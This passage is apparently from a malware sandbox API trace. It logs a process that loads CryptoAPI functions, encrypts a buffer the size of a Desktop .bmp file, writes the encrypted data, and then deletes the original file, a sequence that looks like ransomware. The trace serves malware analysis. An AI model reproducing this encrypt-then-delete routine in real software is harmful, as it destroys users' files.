(in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0123.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0123.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0123.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0123.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0123.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0123.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0123.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0123.023] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0123.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0123.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0123.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0123.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0123.024] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0123.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0123.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0123.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0123.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0123.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0123.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0123.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0123.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0123.024] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e27c0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e27c0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0123.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0123.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0123.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0123.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0123.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0123.026] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0123.027] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0123.027] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0123.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0123.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0123.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0123.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0123.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0123.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0123.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0123.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0123.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0123.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0123.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0123.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0123.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0123.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0123.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0123.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0123.028] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0123.028] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.028] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0123.028] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.028] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0123.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0123.029] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x5ad5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x5ae0) returned 1 [0123.029] CharLowerBuffW (in: lpsz="byte[23265]", cchLength=0xb | out: lpsz="byte[23265]") returned 0xb [0123.029] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.029] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0123.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0123.029] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49bb0b0*, pdwDataLen=0x144e790*=0x5ad5, dwBufLen=0x5ae0 | out: pbData=0x49bb0b0*, pdwDataLen=0x144e790*=0x5ae0) returned 1 [0123.029] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0123.030] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0123.030] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.030] WriteFile (in: hFile=0x2a0, lpBuffer=0x49d7748*, nNumberOfBytesToWrite=0x5ae0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49d7748*, lpNumberOfBytesWritten=0x144f194*=0x5ae0, lpOverlapped=0x0) returned 1 [0123.035] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0123.035] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.035] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0123.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca7a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0123.035] CryptDestroyKey (hKey=0x41ac640) returned 1 [0123.035] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0123.035] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0123.035] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.036] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0123.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0123.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.036] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0123.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0123.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0123.036] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0123.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.036] FreeLibrary (hLibModule=0x756e0000) returned 1 [0123.036] CloseHandle (hObject=0x258) returned 1 [0123.036] CloseHandle (hObject=0x2a0) returned 1 [0123.038] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\gp1QElBYzj-bWq.bmp", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\gp1QElBYzj-bWq.bmp", lpFilePart=0x0) returned 0x2a [0123.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0123.038] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\gp1QElBYzj-bWq.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\gp1qelbyzj-bwq.bmp")) returned 0x20 [0123.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0123.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0123.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0123.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0123.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0123.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0123.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0123.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0123.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0123.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0123.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0123.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392148 [0123.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0123.039] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\gp1QElBYzj-bWq.bmp", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabf40970, ftCreationTime.dwHighDateTime=0x1d5ec9f, ftLastAccessTime.dwLowDateTime=0xc4b9db30, ftLastAccessTime.dwHighDateTime=0x1d5e432, ftLastWriteTime.dwLowDateTime=0xc4b9db30, ftLastWriteTime.dwHighDateTime=0x1d5e432, nFileSizeHigh=0x0, nFileSizeLow=0x5ad5, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="gp1QElBYzj-bWq.bmp", cAlternateFileName="GP1QEL~1.BMP")) returned 0x41ac040 [0123.039] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\gp1QElBYzj-bWq.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\gp1qelbyzj-bwq.bmp")) returned 1 [0123.091] FindNextFileW (in: hFindFile=0x41ac040, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabf40970, ftCreationTime.dwHighDateTime=0x1d5ec9f, ftLastAccessTime.dwLowDateTime=0xc4b9db30, ftLastAccessTime.dwHighDateTime=0x1d5e432, ftLastWriteTime.dwLowDateTime=0xc4b9db30, ftLastWriteTime.dwHighDateTime=0x1d5e432, nFileSizeHigh=0x0, nFileSizeLow=0x5ad5, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="gp1QElBYzj-bWq.bmp", cAlternateFileName="GP1QEL~1.BMP")) returned 